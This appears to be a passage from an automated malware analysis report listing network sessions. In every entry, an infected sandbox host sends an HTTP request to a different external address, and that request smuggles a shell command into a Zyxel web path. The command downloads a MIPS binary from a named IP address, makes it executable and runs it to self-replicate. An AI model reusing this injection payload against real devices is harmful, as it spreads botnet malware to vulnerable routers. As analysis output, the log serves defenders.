                                                      Feb 2, 2024 06:35:55.683758974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5091192.168.2.146038471.219.31.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683792114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5092192.168.2.143507637.93.128.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683842897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5093192.168.2.1459450175.40.228.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683880091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5094192.168.2.1439410130.56.82.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683917046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5095192.168.2.1446570117.8.69.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.683955908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5096192.168.2.1458828219.33.177.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684020042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5097192.168.2.144298095.206.137.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684051037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5098192.168.2.145199041.43.79.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684098005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5099192.168.2.145365676.162.195.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684128046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5100192.168.2.143500473.164.186.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684173107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5101192.168.2.1455126219.183.141.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684199095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5102192.168.2.144959679.109.81.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684228897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5103192.168.2.1441300133.125.236.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684281111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5104192.168.2.1445258166.179.231.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684314966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5105192.168.2.1434218179.27.36.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684370041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5106192.168.2.144536268.98.7.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684416056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5107192.168.2.1455814156.6.97.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684469938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5108192.168.2.144675653.57.52.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684494019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5109192.168.2.1457168201.242.91.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684534073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5110192.168.2.143535442.134.48.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684587955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5111192.168.2.144002634.195.84.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684624910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5112192.168.2.143387836.168.122.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684653997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5113192.168.2.1438234178.205.73.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684690952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5114192.168.2.1447888211.114.103.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684732914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5115192.168.2.144088297.196.175.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684806108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5116192.168.2.1447064120.187.230.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684834957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5117192.168.2.144871299.102.253.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684879065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5118192.168.2.1454970191.123.78.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684921026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5119192.168.2.1455714155.56.223.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.684988976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5120192.168.2.1444910129.217.109.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685045958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5121192.168.2.1450678222.246.187.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685084105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5122192.168.2.1452564136.227.31.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685129881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5123192.168.2.144817612.55.160.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685183048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5124192.168.2.145504647.123.187.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685220957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5125192.168.2.1453672180.209.0.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685245991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5126192.168.2.143430412.32.148.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685297012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5127192.168.2.1450672205.219.150.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685319901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5128192.168.2.143903881.217.124.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685379982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5129192.168.2.1458312185.97.74.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685419083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5130192.168.2.145837464.122.3.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685442924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5131192.168.2.1459350221.141.39.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685477018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5132192.168.2.1454200207.103.85.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685527086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5133192.168.2.1447292101.232.102.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685568094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5134192.168.2.145843289.83.120.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685621977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5135192.168.2.143922471.117.2.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685653925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5136192.168.2.1453002206.198.200.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685718060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5137192.168.2.144187050.167.165.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685762882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5138192.168.2.145385864.133.15.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685790062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5139192.168.2.1459544171.193.57.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685811043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5140192.168.2.1448764210.196.138.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685859919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5141192.168.2.143669090.52.192.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685898066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5142192.168.2.1433390175.51.101.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685933113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5143192.168.2.14545008.126.154.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.685976028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5144192.168.2.1439068171.59.41.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686007977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5145192.168.2.1436552198.193.92.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686023951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5146192.168.2.1435450115.70.244.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686064959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5147192.168.2.1446028162.108.201.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686115980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5148192.168.2.1456920181.95.146.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686156034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5149192.168.2.1443878166.61.25.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686197996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5150192.168.2.1433144123.37.61.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686253071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5151192.168.2.1454062222.129.124.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686276913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5152192.168.2.1436798205.115.210.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:55.686305046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5153192.168.2.143743834.108.239.120443
                                                      TimestampBytes transferredDirectionData
